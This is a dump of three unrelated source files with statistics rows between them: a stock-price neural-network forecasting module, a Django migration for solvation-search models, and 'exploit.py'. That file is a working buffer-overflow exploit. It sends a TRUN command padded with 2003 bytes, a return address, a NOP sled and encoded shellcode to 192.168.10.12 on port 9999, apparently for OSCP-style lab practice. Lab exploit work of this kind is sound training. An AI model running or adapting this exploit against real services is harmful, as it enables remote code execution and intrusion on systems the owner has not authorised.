elif str(*d_layer) == "AvgPool1D":
model.add(AvgPool1D(**d_layer["AvgPool1D"]))
# Dropout (Regularization)
elif str(*d_layer) == "Dropout":
model.add(Dropout(**d_layer["Dropout"]))
# Flatten layer for Convolutions
elif str(*d_layer) == "Flatten":
model.add(Flatten())
else:
print(f"Incorrect neuron type: {str(*d_layer)}")
return model
def mlp(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a multi-layer perceptron model
Parameters
----------
other_args: List[str]
Argparse Arguments
s_ticker: str
Ticker
df_stock: pd.DataFrame
Loaded stock dataframe
"""
try:
ns_parser = parse_args(
prog="mlp",
description="""Multi-Layered-Perceptron. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"MLP Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def rnn(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a Recurrent Neural Network (rnn)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="lstm",
description="""Long-Short Term Memory. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"RNN Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def lstm(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a Long-Short-Term-Memory Neural Net (lstm)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="lstm",
description="""Long-Short Term Memory. """,
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Long_Short_Term_Memory,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"LSTM Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
def conv1d(other_args: List[str], s_ticker: str, df_stock: pd.DataFrame):
"""
Train a 1D Convolutional Neural Net (1D CNN)
Parameters
----------
other_args:List[str]
Argparse arguments
s_ticker: str
Stock ticker
df_stock: pd.DataFrame
Dataframe of stock prices
"""
try:
ns_parser = parse_args(
prog="conv1d",
description="""1D CNN.""",
other_args=other_args,
)
if not ns_parser:
return
(
X_train,
X_valid,
y_train,
y_valid,
_,
_,
_,
y_dates_valid,
forecast_data_input,
dates_forecast_input,
scaler,
is_error,
) = prepare_scale_train_valid_test(df_stock["Adj Close"], ns_parser)
if is_error:
return
print(
f"Training on {X_train.shape[0]} sequences of length {X_train.shape[1]}. Using {X_valid.shape[0]} sequences "
f" of length {X_valid.shape[1]} for validation. Model will run {ns_parser.n_loops} loops"
)
future_dates = get_next_stock_market_days(
dates_forecast_input[-1], n_next_days=ns_parser.n_days
)
preds = np.zeros((ns_parser.n_loops, X_valid.shape[0], ns_parser.n_days))
forecast_data = np.zeros((ns_parser.n_loops, ns_parser.n_days))
for i in range(ns_parser.n_loops):
# Build Neural Network model
model = build_neural_network_model(
cfg_nn_models.Convolutional,
ns_parser.n_inputs,
ns_parser.n_days,
)
model.compile(
optimizer=optimizers[cfg_nn_models.Optimizer](
learning_rate=ns_parser.lr
),
loss=cfg_nn_models.Loss,
)
model.fit(
X_train.reshape(X_train.shape[0], X_train.shape[1], 1),
y_train,
epochs=ns_parser.n_epochs,
verbose=True,
batch_size=ns_parser.n_batch_size,
validation_data=(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1),
y_valid,
),
callbacks=[es],
)
preds[i] = model.predict(
X_valid.reshape(X_valid.shape[0], X_valid.shape[1], 1)
).reshape(X_valid.shape[0], ns_parser.n_days)
forecast_data[i] = forecast(
forecast_data_input, future_dates, model, scaler
).values.flat
forecast_data_df = pd.DataFrame(forecast_data.T, index=future_dates)
if ns_parser.n_loops > 1:
forecast_data_df["Median"] = forecast_data_df.median(axis=1)
print_pretty_prediction(
forecast_data_df["Median"], df_stock["Adj Close"].values[-1]
)
else:
print_pretty_prediction(
forecast_data_df[0], df_stock["Adj Close"].values[-1]
)
plot_data_predictions(
df_stock,
np.median(preds, axis=0),
y_valid,
y_dates_valid,
scaler,
f"Conv1D Model on {s_ticker}",
forecast_data_df,
ns_parser.n_loops,
)
print("")
except Exception as e:
print(e)
traceback.print_exc()
print("")
finally:
restore_env()
| 31.912671
| 122
| 0.548854
| 2,199
| 18,637
| 4.355161
| 0.099591
| 0.060144
| 0.052626
| 0.035084
| 0.811528
| 0.792315
| 0.745849
| 0.745849
| 0.745849
| 0.745849
| 0
| 0.010204
| 0.353222
| 18,637
| 583
| 123
| 31.96741
| 0.784304
| 0.100982
| 0
| 0.708972
| 0
| 0.017505
| 0.083273
| 0.001517
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010941
| false
| 0
| 0.02407
| 0
| 0.054705
| 0.065646
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d80d3022b4905b879f9714b883258a4e58caa96
| 1,785
|
py
|
Python
|
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
OSCP/exploit.py
|
markhalasz/pyneta
|
444bfb94dba05c91a40821196d272609ea8ff875
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import socket
import sys
exploit = (
"\xd9\xe5\xd9\x74\x24\xf4\xba\x19\x3e\xf2\xb4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x03\x50\x17\x83\xf1\xc2\x10\x41\xfd\xd3\x57"
"\xaa\xfd\x23\x38\x22\x18\x12\x78\x50\x69\x05\x48\x12\x3f\xaa"
"\x23\x76\xab\x39\x41\x5f\xdc\x8a\xec\xb9\xd3\x0b\x5c\xf9\x72"
"\x88\x9f\x2e\x54\xb1\x6f\x23\x95\xf6\x92\xce\xc7\xaf\xd9\x7d"
"\xf7\xc4\x94\xbd\x7c\x96\x39\xc6\x61\x6f\x3b\xe7\x34\xfb\x62"
"\x27\xb7\x28\x1f\x6e\xaf\x2d\x1a\x38\x44\x85\xd0\xbb\x8c\xd7"
"\x19\x17\xf1\xd7\xeb\x69\x36\xdf\x13\x1c\x4e\x23\xa9\x27\x95"
"\x59\x75\xad\x0d\xf9\xfe\x15\xe9\xfb\xd3\xc0\x7a\xf7\x98\x87"
"\x24\x14\x1e\x4b\x5f\x20\xab\x6a\x8f\xa0\xef\x48\x0b\xe8\xb4"
"\xf1\x0a\x54\x1a\x0d\x4c\x37\xc3\xab\x07\xda\x10\xc6\x4a\xb3"
"\xd5\xeb\x74\x43\x72\x7b\x07\x71\xdd\xd7\x8f\x39\x96\xf1\x48"
"\x3d\x8d\x46\xc6\xc0\x2e\xb7\xcf\x06\x7a\xe7\x67\xae\x03\x6c"
"\x77\x4f\xd6\x23\x27\xff\x89\x83\x97\xbf\x79\x6c\xfd\x4f\xa5"
"\x8c\xfe\x85\xce\x27\x05\x4e\x31\x1f\x0f\x37\xd9\x62\x0f\x56"
"\x46\xea\xe9\x32\x66\xba\xa2\xaa\x1f\xe7\x38\x4a\xdf\x3d\x45"
"\x4c\x6b\xb2\xba\x03\x9c\xbf\xa8\xf4\x6c\x8a\x92\x53\x72\x20"
"\xba\x38\xe1\xaf\x3a\x36\x1a\x78\x6d\x1f\xec\x71\xfb\x8d\x57"
"\x28\x19\x4c\x01\x13\x99\x8b\xf2\x9a\x20\x59\x4e\xb9\x32\xa7"
"\x4f\x85\x66\x77\x06\x53\xd0\x31\xf0\x15\x8a\xeb\xaf\xff\x5a"
"\x6d\x9c\x3f\x1c\x72\xc9\xc9\xc0\xc3\xa4\x8f\xff\xec\x20\x18"
"\x78\x11\xd1\xe7\x53\x91\xf1\x05\x71\xec\x99\x93\x10\x4d\xc4"
"\x23\xcf\x92\xf1\xa7\xe5\x6a\x06\xb7\x8c\x6f\x42\x7f\x7d\x02"
"\xdb\xea\x81\xb1\xdc\x3e")
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 + exploit
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect=s.connect(('192.168.10.12', 9999))
s.send(('TRUN /.:/' + shellcode))
except:
print "check debuger"
s.close()
| 42.5
| 66
| 0.703641
| 398
| 1,785
| 3.150754
| 0.527638
| 0.009569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.273574
| 0.037535
| 1,785
| 41
| 67
| 43.536585
| 0.456345
| 0.011204
| 0
| 0
| 0
| 0.657143
| 0.827664
| 0.795918
| 0.028571
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057143
| null | null | 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4d8289d06a57bc1f03711f994592163976287b2b
| 23,482
|
py
|
Python
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 10
|
2015-10-02T00:11:02.000Z
|
2021-04-04T05:57:10.000Z
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 128
|
2015-05-29T18:21:05.000Z
|
2022-03-01T21:06:01.000Z
|
rmgweb/database/migrations/0012_auto_20210902_1652.py
|
ReactionMechanismGenerator/RMG-website
|
7fe2ef9bdce6256cbc9f2453661cb482b2e97395
|
[
"MIT"
] | 23
|
2015-07-18T23:40:21.000Z
|
2021-04-24T02:58:46.000Z
|
# Generated by Django 2.2.5 on 2021-09-02 16:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('database', '0011_auto_20210706_1533'),
]
operations = [
migrations.CreateModel(
name='SoluteSearch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solute_smiles', models.TextField(null=True, verbose_name='Solute SMILES(s)')),
('solute_estimator', models.CharField(blank=True, choices=[('expt', 'Experimental (RMG-database)'), ('SoluteGC', 'Group Contribution Prediction (SoluteGC)'), ('SoluteML', 'Machine Learning Prediction (SoluteML)')], max_length=200, verbose_name='Solute Parameter Search Method')),
('solvent', models.CharField(blank=True, choices=[('water', '1. water'), ('1-octanol', '2. 1-octanol'), ('benzene', '3. benzene'), ('cyclohexane', '4. cyclohexane'), ('dibutylether', '5. dibutylether'), ('octane', '6. octane'), ('butanol', '7. butanol'), ('carbontet', '8. carbontet'), ('chloroform', '9. chloroform'), ('decane', '10. decane'), ('1,1-dichloroethane', '11. 1,1-dichloroethane'), ('dimethylformamide', '12. dimethylformamide'), ('dimethylsulfoxide', '13. dimethylsulfoxide'), ('dodecane', '14. dodecane'), ('ethanol', '15. ethanol'), ('heptane', '16. heptane'), ('hexadecane', '17. hexadecane'), ('hexane', '18. hexane'), ('isooctane', '19. isooctane'), ('nonane', '20. nonane'), ('pentane', '21. pentane'), ('toluene', '22. toluene'), ('undecane', '23. undecane'), ('acetonitrile', '24. acetonitrile'), ('ethylacetate', '25. ethylacetate'), ('methanol', '26. methanol'), ('methanol_50_water_50', '27. methanol_50_water_50'), ('acetonitrile_40_water_60', '28. acetonitrile_40_water_60'), ('acetonitrile_60_water_40', '29. acetonitrile_60_water_40'), ('2-methylpyridine', '30. 2-methylpyridine'), ('4-methylpentan-2-one', '31. 4-methylpentan-2-one'), ('acetic acid', '32. acetic acid'), ('1-phenylethanone', '33. 1-phenylethanone'), ('aniline', '34. aniline'), ('anisole', '35. anisole'), ('benzonitrile', '36. benzonitrile'), ('phenylmethanol', '37. phenylmethanol'), ('bromobenzene', '38. bromobenzene'), ('bromoethane', '39. bromoethane'), ('bromoform', '40. bromoform'), ('butan-2-one', '41. butan-2-one'), ('butyl acetate', '42. butyl acetate'), ('butylbenzene', '43. butylbenzene'), ('carbon disulfide', '44. carbon disulfide'), ('chlorobenzene', '45. chlorobenzene'), ('1-chlorohexane', '46. 1-chlorohexane'), ('cyclohexanone', '47. cyclohexanone'), ('decalin', '48. decalin'), ('decan-1-ol', '49. decan-1-ol'), ('1,1-dibromoethane', '50. 1,1-dibromoethane'), ('1,2-dichloroethane', '51. 1,2-dichloroethane'), ('ethoxyethane', '52. ethoxyethane'), ('2-propan-2-yloxypropane', '53. 2-propan-2-yloxypropane'), ('N,N-dimethylacetamide', '54. N,N-dimethylacetamide'), ('ethoxybenzene', '55. ethoxybenzene'), ('ethylbenzene', '56. ethylbenzene'), ('fluorobenzene', '57. fluorobenzene'), ('heptan-1-ol', '58. heptan-1-ol'), ('1-iodohexadecane', '59. 1-iodohexadecane'), ('hexan-1-ol', '60. hexan-1-ol'), ('iodobenzene', '61. iodobenzene'), ('2-methylpropan-1-ol', '62. 2-methylpropan-1-ol'), ('propan-2-ol', '63. propan-2-ol'), ('cumene', '64. cumene'), ('3-methylphenol', '65. 3-methylphenol'), ('2-methoxyethanol', '66. 2-methoxyethanol'), ('dichloromethane', '67. dichloromethane'), ('N-methylformamide', '68. N-methylformamide'), ('nitrobenzene', '69. nitrobenzene'), ('1-nitroethane', '70. 1-nitroethane'), ('nitromethane', '71. nitromethane'), ('nonan-1-ol', '72. nonan-1-ol'), ('1,2-dichlorobenzene', '73. 1,2-dichlorobenzene'), ('pentadecane', '74. pentadecane'), ('pentan-1-ol', '75. pentan-1-ol'), ('hexafluorobenzene', '76. hexafluorobenzene'), ('propan-1-ol', '77. propan-1-ol'), ('pyridine', '78. pyridine'), ('butan-2-ol', '79. butan-2-ol'), ('tert-butylbenzene', '80. tert-butylbenzene'), ('1,1,2,2-tetrachloroethene', '81. 1,1,2,2-tetrachloroethene'), ('oxolane', '82. oxolane'), ('1,2,3,4-tetrahydronaphthalene', '83. 1,2,3,4-tetrahydronaphthalene'), ('tributyl phosphate', '84. tributyl phosphate'), ('N,N-diethylethanamine', '85. N,N-diethylethanamine'), ('1,2,4-trimethylbenzene', '86. 1,2,4-trimethylbenzene'), ('1,4-xylene', '87. 1,4-xylene'), ('2-methylpropan-2-ol', '88. 2-methylpropan-2-ol'), ('3-methylbutan-1-ol', '89. 3-methylbutan-1-ol'), ('undecan-1-ol', '90. undecan-1-ol'), ('propan-2-one', '91. propan-2-one'), ('methyl acetate', '92. methyl acetate'), ('propyl acetate', '93. propyl acetate'), ('pentyl acetate', '94. pentyl acetate'), ('2-methylbutan-2-ol', '95. 2-methylbutan-2-ol'), ('4-methylpentan-2-ol', '96. 4-methylpentan-2-ol'), ('2-methylpentan-1-ol', '97. 2-methylpentan-1-ol'), ('2-ethylhexan-1-ol', '98. 2-ethylhexan-1-ol'), ('2-methoxy-2-methylpropane', '99. 2-methoxy-2-methylpropane'), ('dodecan-1-ol', '100. dodecan-1-ol'), ('2-butoxyethanol', '101. 2-butoxyethanol'), ('2-ethoxyethanol', '102. 2-ethoxyethanol'), ('1-propoxypropane', '103. 1-propoxypropane'), ('pentan-2-ol', '104. pentan-2-ol'), ('2-methylbutan-1-ol', '105. 2-methylbutan-1-ol'), ('pentan-3-ol', '106. pentan-3-ol'), ('2-propoxyethanol', '107. 2-propoxyethanol'), ('2-propan-2-yloxyethanol', '108. 2-propan-2-yloxyethanol'), ('3-methoxybutan-1-ol', '109. 3-methoxybutan-1-ol'), ('1-tert-butoxy-2-propanol', '110. 1-tert-butoxy-2-propanol'), ('2-methoxy-2-methylbutane', '111. 2-methoxy-2-methylbutane'), ('pentan-2-one', '112. pentan-2-one'), ('ethyl butanoate', '113. ethyl butanoate'), ('heptan-2-one', '114. heptan-2-one'), ('hexyl acetate', '115. hexyl acetate'), ('1-nitro-2-octoxybenzene', '116. 1-nitro-2-octoxybenzene'), ('1-methylpyrrolidin-2-one', '117. 1-methylpyrrolidin-2-one'), ('N-methylacetamide', '118. N-methylacetamide'), ('morpholine-4-carbaldehyde', '119. morpholine-4-carbaldehyde'), ('N,N-dibutylformamide', '120. N,N-dibutylformamide'), ('formamide', '121. formamide'), ('N,N-diethylacetamide', '122. N,N-diethylacetamide'), ('1-methylpiperidin-2-one', '123. 1-methylpiperidin-2-one'), ('N-ethylformamide', '124. N-ethylformamide'), ('N-ethylacetamide', '125. N-ethylacetamide'), ('triolein', '126. triolein'), ('deca-1,9-diene', '127. deca-1,9-diene'), ('hexadec-1-ene', '128. hexadec-1-ene'), ('1,3-xylene', '129. 1,3-xylene'), ('1,2-xylene', '130. 1,2-xylene'), ('1,4-dioxane', '131. 1,4-dioxane'), ('1-chlorobutane', '132. 1-chlorobutane'), ('1,1,2,2-tetrabromoethane', '133. 1,1,2,2-tetrabromoethane'), ('1,1,2,2-tetrachloroethane', '134. 1,1,2,2-tetrachloroethane'), ('propane-1,2-diol', '135. propane-1,2-diol'), ('1,3-dimethylimidazolidin-2-one', '136. 1,3-dimethylimidazolidin-2-one'), ('propane-1,3-diol', '137. propane-1,3-diol'), ('butane-1,4-diol', '138. butane-1,4-diol'), ('pentane-1,5-diol', '139. pentane-1,5-diol'), ('1-bromonaphthalene', '140. 1-bromonaphthalene'), ('1-chloronaphthalene', '141. 1-chloronaphthalene'), ('dec-1-ene', '142. dec-1-ene'), ('hex-1-ene', '143. hex-1-ene'), ('1-nitropropane', '144. 1-nitropropane'), ('oct-1-ene', '145. oct-1-ene'), ('2-sulfanylethanol', '146. 2-sulfanylethanol'), ('3-methylthiolane 1,1-dioxide', '147. 3-methylthiolane 1,1-dioxide'), ('hexanedinitrile', '148. hexanedinitrile'), ('benzyl acetate', '149. benzyl acetate'), ('cyclohexylcyclohexane', '150. cyclohexylcyclohexane'), ('butanenitrile', '151. butanenitrile'), ('cis-1,2-dichloroethene', '152. cis-1,2-dichloroethene'), ('cis-decaline', '153. cis-decaline'), ('cyclohexanol', '154. cyclohexanol'), ('cyclohexylbenzene', '155. cyclohexylbenzene'), ('cyclopentanone', '156. cyclopentanone'), ('deuterated water', '157. deuterated water'), ('bis(2-ethylhexyl) hexanedioate', '158. bis(2-ethylhexyl) hexanedioate'), ('2,2-dichloroacetic acid', '159. 2,2-dichloroacetic acid'), ('diethyl benzene-1,2-dicarboxylate', '160. diethyl benzene-1,2-dicarboxylate'), ('2-(2-hydroxyethoxy)ethanol', '161. 2-(2-hydroxyethoxy)ethanol'), ('1-ethoxy-2-(2-ethoxyethoxy)ethane', '162. 1-ethoxy-2-(2-ethoxyethoxy)ethane'), ('1-methoxy-2-(2-methoxyethoxy)ethane', '163. 1-methoxy-2-(2-methoxyethoxy)ethane'), ('diiodomethane', '164. diiodomethane'), ('dibutyl benzene-1,2-dicarboxylate', '165. dibutyl benzene-1,2-dicarboxylate'), ('dinonyl benzene-1,2-dicarboxylate', '166. dinonyl benzene-1,2-dicarboxylate'), ('bis(2-ethylhexyl) phthalate', '167. bis(2-ethylhexyl) phthalate'), ('3-(3-hydroxypropoxy)propan-1-ol', '168. 3-(3-hydroxypropoxy)propan-1-ol'), ('ethane-1,2-diol', '169. ethane-1,2-diol'), ('furan-2-carbaldehyde', '170. furan-2-carbaldehyde'), ('furan-2-ylmethanol', '171. furan-2-ylmethanol'), ('oxolan-2-one', '172. oxolan-2-one'), ('1H-indene', '173. 1H-indene'), ('2-aminoethanol', '174. 2-aminoethanol'), ('1-ethylpyrrolidin-2-one', '175. 1-ethylpyrrolidin-2-one'), ('tetradecane', '176. tetradecane'), ('tridecane', '177. tridecane'), ('octamethylcyclotetrasiloxane', '178. octamethylcyclotetrasiloxane'), ('perflexane', '179. perflexane'), ('perfluorooctane', '180. perfluorooctane'), ('2-phenylacetonitrile', '181. 2-phenylacetonitrile'), ('propanenitrile', '182. propanenitrile'), ('4-methyl-1,3-dioxolan-2-one', '183. 4-methyl-1,3-dioxolan-2-one'), ('quinoline', '184. quinoline'), ('2-chlorobutane', '185. 2-chlorobutane'), ('squalane', '186. squalane'), ('tetraethylene glycol', '187. tetraethylene glycol'), ('tetraglyme', '188. tetraglyme'), ('thiodiglycol', '189. thiodiglycol'), ('trans-1,2-dichloroethene', '190. trans-1,2-dichloroethene'), ('trans-decalin', '191. trans-decalin'), ('N,N-dipentylpentan-1-amine', '192. N,N-dipentylpentan-1-amine'), ('tricaprylin', '193. tricaprylin'), ('triethyl phosphate', '194. triethyl phosphate'), ('triethylene glycol', '195. triethylene glycol'), ('triglyme', '196. triglyme'), ('N,N-dibutylbutan-1-amine', '197. N,N-dibutylbutan-1-amine'), ('N,N-dioctyloctan-1-amine', '198. N,N-dioctyloctan-1-amine'), ('hexamethylphosphoramide', '199. hexamethylphosphoramide'), ('dimethyl carbonate', '200. dimethyl carbonate'), ('diethyl carbonate', '201. diethyl carbonate')], max_length=200, verbose_name='Solvent (Optional)')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.CreateModel(
name='SolvationSearchML',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solvent_solute_smiles', models.TextField(null=True, verbose_name='Solvent_Solute SMILES(s)')),
('calc_dGsolv', models.BooleanField(default=False, verbose_name='dGsolv')),
('calc_dHsolv', models.BooleanField(default=False, verbose_name='dHsolv')),
('calc_dSsolv', models.BooleanField(default=False, verbose_name='dSsolv')),
('calc_logK', models.BooleanField(default=False, verbose_name='logK')),
('calc_logP', models.BooleanField(default=False, verbose_name='logP')),
('option_selected', models.BooleanField(default=False, verbose_name='at least one option selected')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.CreateModel(
name='SolvationSearchTempDep',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('solvent_solute_temp', models.TextField(null=True, verbose_name='Solvent SMILES & Solute SMILES & Temperature')),
('calc_dGsolv', models.BooleanField(default=False, verbose_name='dGsolv')),
('calc_Kfactor', models.BooleanField(default=False, verbose_name='K-factor')),
('calc_henry', models.BooleanField(default=False, verbose_name="Henry's law constant")),
('calc_logK', models.BooleanField(default=False, verbose_name='logK')),
('calc_logP', models.BooleanField(default=False, verbose_name='logP')),
('option_selected', models.BooleanField(default=False, verbose_name='at least one option selected')),
('temp_unit', models.CharField(choices=[('K', 'K'), ('°C', '°C')], default='Kelvin', max_length=200, verbose_name='Input temperature unit')),
('energy_unit', models.CharField(choices=[('kcal/mol', 'kcal/mol'), ('kJ/mol', 'kJ/mol')], default='kcal/mol', max_length=200, verbose_name='Preferred unit')),
],
),
migrations.AlterField(
model_name='solventselection',
name='solvent',
